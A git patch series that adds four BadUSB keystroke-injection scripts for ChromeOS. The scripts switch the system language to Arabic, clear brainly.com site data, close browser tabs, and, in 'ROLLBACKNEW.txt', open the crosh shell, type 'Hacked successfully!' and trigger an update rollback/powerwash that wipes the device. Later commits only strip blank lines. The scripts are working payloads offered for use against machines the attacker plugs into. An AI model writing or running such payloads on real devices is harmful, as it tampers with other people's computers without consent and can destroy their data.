From 27ae4cee3c3d7f0cb40ed28378ae5fee092f8910 Mon Sep 17 00:00:00 2001 From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com> Date: Fri, 2 Jun 2023 16:44:36 -0700 Subject: [PATCH 1/9] Create arabicnew.txt --- BadUSB/chromeOS/wip/arabicnew.txt | 38 +++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 BadUSB/chromeOS/wip/arabicnew.txt diff --git a/BadUSB/chromeOS/wip/arabicnew.txt b/BadUSB/chromeOS/wip/arabicnew.txt new file mode 100644 index 000000000..5d8eff645 --- /dev/null +++ b/BadUSB/chromeOS/wip/arabicnew.txt @@ -0,0 +1,38 @@ +REM MADE BY HTTPS / https://github.com/httpsisbetter +REM Changes language in settings to arabic ( It will still have the language input bar in the bottom ) +REM Requirements: CHROMEOS + +DEFAULTDELAY 100 + +CTRL W +REPEAT 3 +TAB +ENTER +DELAY 500 +STRING add input methods +DELAY 1000 +ENTER + +DELAY 3000 +ENTER +DELAY 700 +STRING arabic +DELAY 500 +ENTER +TAB +TAB +ENTER +TAB +TAB +ENTER + +DELAY 500 +SHIFT TAB +DELAY 70 +SHIFT TAB +DELAY 70 +SHIFT TAB +DELAY 70 +ENTER +CTRL W +REPEAT 3 From 3391e89278d7e335fa2824d69e5c6c95fdba4a5c Mon Sep 17 00:00:00 2001 From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com> Date: Fri, 2 Jun 2023 16:50:40 -0700 Subject: [PATCH 2/9] Update arabicnew.txt --- BadUSB/chromeOS/wip/arabicnew.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/BadUSB/chromeOS/wip/arabicnew.txt b/BadUSB/chromeOS/wip/arabicnew.txt index 5d8eff645..f1223708e 100644 --- a/BadUSB/chromeOS/wip/arabicnew.txt +++ b/BadUSB/chromeOS/wip/arabicnew.txt @@ -5,7 +5,7 @@ REM Requirements: CHROMEOS DEFAULTDELAY 100 CTRL W -REPEAT 3 +REPEAT 2 TAB ENTER DELAY 500 @@ -35,4 +35,4 @@ SHIFT TAB DELAY 70 ENTER CTRL W -REPEAT 3 +REPEAT 2 From c994d7236949195f8ab19a38a91a3323d899662e Mon Sep 17 00:00:00 2001 From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com> Date: Fri, 2 Jun 2023 16:51:04 -0700 Subject: [PATCH 3/9] Create brainynew.txt --- BadUSB/chromeOS/wip/brainynew.txt | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 BadUSB/chromeOS/wip/brainynew.txt diff --git a/BadUSB/chromeOS/wip/brainynew.txt b/BadUSB/chromeOS/wip/brainynew.txt new file mode 100644 index 000000000..0df8a08cb --- /dev/null +++ b/BadUSB/chromeOS/wip/brainynew.txt @@ -0,0 +1,19 @@ +REM MADE BY HTTPS / https://github.com/httpsisbetter +REM Resets brainly.com cookies for you +REM CHROMEOS + +DEFAULTDELAY 500 + +CTRL T +STRING chrome://settings/siteData +ENTER +DELAY 3000 +TAB +DELAY 2000 +STRING brainly +DELAY 1000 +TAB +REPEAT 3 +ENTER +DELAY 1000 +CTRL W From 4369bb5a770ce3ba4872222c62603576336791ff Mon Sep 17 00:00:00 2001 From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com> Date: Fri, 2 Jun 2023 16:59:15 -0700 Subject: [PATCH 4/9] Create closetestnew.txt --- BadUSB/chromeOS/wip/closetestnew.txt | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 BadUSB/chromeOS/wip/closetestnew.txt diff --git a/BadUSB/chromeOS/wip/closetestnew.txt b/BadUSB/chromeOS/wip/closetestnew.txt new file mode 100644 index 000000000..a8f82f209 --- /dev/null +++ b/BadUSB/chromeOS/wip/closetestnew.txt @@ -0,0 +1,8 @@ +REM MADE BY HTTPS / https://github.com/httpsisbetter +REM Closes all tabs ( Change the amount of CTRL W you want the more the ctrl W the more tabs it closes ) +REM ChromeB + +DEFAULTDELAY 100 + +CTRL W +REPEAT 2 From a555a8fb498c58be748d374ca7c008fdbf214756 Mon Sep 17 00:00:00 2001 From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com> Date: Fri, 2 Jun 2023 17:21:06 -0700 Subject: [PATCH 5/9] Create ROLLBACKNEW.txt --- BadUSB/chromeOS/wip/ROLLBACKNEW.txt | 33 +++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 BadUSB/chromeOS/wip/ROLLBACKNEW.txt diff --git a/BadUSB/chromeOS/wip/ROLLBACKNEW.txt b/BadUSB/chromeOS/wip/ROLLBACKNEW.txt new file mode 100644 index 000000000..e9180641e --- /dev/null +++ b/BadUSB/chromeOS/wip/ROLLBACKNEW.txt @@ -0,0 +1,33 @@ +REM MADE BY HTTPS / https://github.com/httpsisbetter +REM Will commit a update rollback/powerwash +REM Might not work with enterprise enrolled devices +REM Requirement: CHROMEOS + + +DEFAULTDELAY 100 + + +CTRL W +REPEAT 2 +DELAY 2000 +TAB +TAB +TAB +ENTER +DELAY 1000 +STRING chrome-untrusted://crosh +ENTER +DELAY 3000 +STRING Hacked successfully! +ENTER +DELAY 2000 +STRING cat > /dev/null << EOF +ENTER +DELAY 500 +STRING rollback +DELAY 1000 +ENTER +DELAY 1000 +STRING Y +DELAY 500 +ENTER From d3f99f3eae828f6f10cd72ec209306077ac5e160 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Tue, 4 Jul 2023 22:16:20 -0700 Subject: [PATCH 6/9] Removed spaces (can cause issues) --- BadUSB/chromeOS/wip/ROLLBACKNEW.txt | 4 ---- 1 file changed, 4 deletions(-) diff --git a/BadUSB/chromeOS/wip/ROLLBACKNEW.txt b/BadUSB/chromeOS/wip/ROLLBACKNEW.txt index e9180641e..13d2fbb7a 100644 --- a/BadUSB/chromeOS/wip/ROLLBACKNEW.txt +++ b/BadUSB/chromeOS/wip/ROLLBACKNEW.txt @@ -2,11 +2,7 @@ REM MADE BY HTTPS / https://github.com/httpsisbetter REM Will commit a update rollback/powerwash REM Might not work with enterprise enrolled devices REM Requirement: CHROMEOS - - DEFAULTDELAY 100 - - CTRL W REPEAT 2 DELAY 2000 From 8a795678e4921560efc9369b80e3e5ba7b577aa6 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Tue, 4 Jul 2023 22:16:59 -0700 Subject: [PATCH 7/9] Removed spaces (can cause issues) --- BadUSB/chromeOS/wip/arabicnew.txt | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/BadUSB/chromeOS/wip/arabicnew.txt b/BadUSB/chromeOS/wip/arabicnew.txt index f1223708e..c8c88da9a 100644 --- a/BadUSB/chromeOS/wip/arabicnew.txt +++ b/BadUSB/chromeOS/wip/arabicnew.txt @@ -1,9 +1,7 @@ REM MADE BY HTTPS / https://github.com/httpsisbetter REM Changes language in settings to arabic ( It will still have the language input bar in the bottom ) REM Requirements: CHROMEOS - DEFAULTDELAY 100 - CTRL W REPEAT 2 TAB @@ -12,7 +10,7 @@ DELAY 500 STRING add input methods DELAY 1000 ENTER - +REM ----- DELAY 3000 ENTER DELAY 700 @@ -25,7 +23,7 @@ ENTER TAB TAB ENTER - +REM ----- DELAY 500 SHIFT TAB DELAY 70 From 446aba6aff5fc0d36e5d679a8f2558a6ee93a546 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Tue, 4 Jul 2023 22:18:10 -0700 Subject: [PATCH 8/9] Removed spaces (can cause issues) --- BadUSB/chromeOS/wip/brainynew.txt | 2 -- 1 file changed, 2 deletions(-) diff --git a/BadUSB/chromeOS/wip/brainynew.txt b/BadUSB/chromeOS/wip/brainynew.txt index 0df8a08cb..092f2689f 100644 --- a/BadUSB/chromeOS/wip/brainynew.txt +++ b/BadUSB/chromeOS/wip/brainynew.txt @@ -1,9 +1,7 @@ REM MADE BY HTTPS / https://github.com/httpsisbetter REM Resets brainly.com cookies for you REM CHROMEOS - DEFAULTDELAY 500 - CTRL T STRING chrome://settings/siteData ENTER From 444b208b6764298f4d50ab9440268b248399b5f2 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Tue, 4 Jul 2023 22:18:26 -0700 Subject: [PATCH 9/9] Removed spaces (can cause issues) --- BadUSB/chromeOS/wip/closetestnew.txt | 2 -- 1 file changed, 2 deletions(-) diff --git a/BadUSB/chromeOS/wip/closetestnew.txt b/BadUSB/chromeOS/wip/closetestnew.txt index a8f82f209..8b36b278d 100644 --- a/BadUSB/chromeOS/wip/closetestnew.txt +++ b/BadUSB/chromeOS/wip/closetestnew.txt @@ -1,8 +1,6 @@ REM MADE BY HTTPS / https://github.com/httpsisbetter REM Closes all tabs ( Change the amount of CTRL W you want the more the ctrl W the more tabs it closes ) REM ChromeB - DEFAULTDELAY 100 - CTRL W REPEAT 2